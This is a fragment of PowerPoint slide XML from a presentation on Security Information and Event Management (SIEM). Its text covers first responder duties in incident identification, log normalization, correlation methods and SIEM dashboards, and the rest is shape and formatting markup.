                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>activity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043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10">
                <a:solidFill>
                  <a:srgbClr val="3B4043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0">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>suspicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>identification</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3B4043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3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>responder.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 algn="ctr" marL="4445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2039"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>First</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>responder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>responsibilities: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18864" y="306451"/>
            <a:ext cx="801814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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Management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2076" y="760476"/>
            <a:ext cx="12038076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001392" y="3348609"/>
            <a:ext cx="12563475" cy="1854200"/>
            <a:chOff x="2001392" y="3348609"/>
            <a:chExt cx="12563475" cy="1854200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2023109" y="3358134"/>
              <a:ext cx="4320540" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="469900">
                  <a:moveTo>
                    <a:pt x="4242308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314388" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297616" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4272748" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242308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023109" y="3358134"/>
              <a:ext cx="4320540" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4242308" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4272748" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297616" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314388" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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010917" y="3827526"/>
              <a:ext cx="12544425" cy="1365885"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1365885">
                  <a:moveTo>
                    <a:pt x="12431903" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112140" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68526" y="8806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32877" y="32829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8824" y="68472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1253363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8824" y="1296977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32877" y="1332626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68526" y="1356679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112140" y="1365503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12431903" y="1365503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12475517" y="1356679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511166" y="1332626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535219" y="1296977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="1253363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="112140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535219" y="68472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511166" y="32829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12475517" y="8806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124319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010917" y="3827526"/>
              <a:ext cx="12544425" cy="1365885"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1365885">
                  <a:moveTo>
                    <a:pt x="0" y="112140"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8824" y="68472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32877" y="32829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68526" y="8806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112140" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12431903" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12475517" y="8806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511166" y="32829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535219" y="68472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="112140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="1253363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535219" y="1296977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511166" y="1332626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12475517" y="1356679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12431903" y="1365503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112140" y="1365503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68526" y="1356679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32877" y="1332626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8824" y="1296977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1253363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112140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1902714" y="5796153"/>
            <a:ext cx="12544425" cy="1879600"/>
            <a:chOff x="1902714" y="5796153"/>
            <a:chExt cx="12544425" cy="1879600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1914906" y="5805678"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="4240783" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4240783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914906" y="5805678"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4240783" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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902714" y="6275070"/>
              <a:ext cx="12544425" cy="1400810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1400809">
                  <a:moveTo>
                    <a:pt x="12428982" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="115062" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70294" y="9048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33718" y="33718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9048" y="70294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="115061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1285493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9048" y="1330261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33718" y="1366837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70294" y="1391507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115062" y="1400555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12428982" y="1400555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473749" y="1391507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12510325" y="1366837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534995" y="1330261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1285493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="115061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534995" y="70294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12510325" y="33718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473749" y="9048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124289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1960308" y="5874258"/>
            <a:ext cx="12428855" cy="14160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2415520" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="39405A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dirty="0" u="heavy" sz="2200" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="39405A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dirty="0" u="heavy" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="39405A"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Retention	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50">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="666115" indent="-343535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666115" algn="l"/>
                <a:tab pos="666750" algn="l"/>
              </a:tabLst>
            </a:pP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Evidence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attack</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="666115" indent="-343535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666115" algn="l"/>
                <a:tab pos="666750" algn="l"/>
              </a:tabLst>
            </a:pP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Threat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hunting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retrospective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incident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identification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06498" y="1882292"/>
            <a:ext cx="11776710" cy="3154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75565" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Information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Event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Management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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(SIEM)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system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passes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traffic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log </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-56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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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various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sources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normalize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information.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="63500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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normalization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activities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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>rendered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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SIEM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are: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785"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Correlation</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="462280" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2185"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="462280" algn="l"/>
                <a:tab pos="462915" algn="l"/>
              </a:tabLst>
            </a:pP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Static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rules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logical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expressions</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="462280" indent="-343535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462280" algn="l"/>
                <a:tab pos="462915" algn="l"/>
              </a:tabLst>
            </a:pP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Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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intelligence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feeds</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="462280" indent="-343535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462280" algn="l"/>
                <a:tab pos="462915" algn="l"/>
              </a:tabLst>
            </a:pP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AI-assisted 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analysis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92316" y="306451"/>
            <a:ext cx="30714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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboards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96940" y="760476"/>
            <a:ext cx="4247388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568065" y="1756298"/>
            <a:ext cx="9115425" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SIEM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dashboard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serves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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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command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centre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incident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response.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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types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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SIEM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dashboards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are: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608444" y="3661028"/>
            <a:ext cx="3404235" cy="3036570"/>
            <a:chOff x="6608444" y="3661028"/>
            <a:chExt cx="3404235" cy="3036570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6617969" y="3670553"/>
              <a:ext cx="3017520" cy="3017520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3017520" h="3017520">
                  <a:moveTo>
                    <a:pt x="0" y="1508760"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="745" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
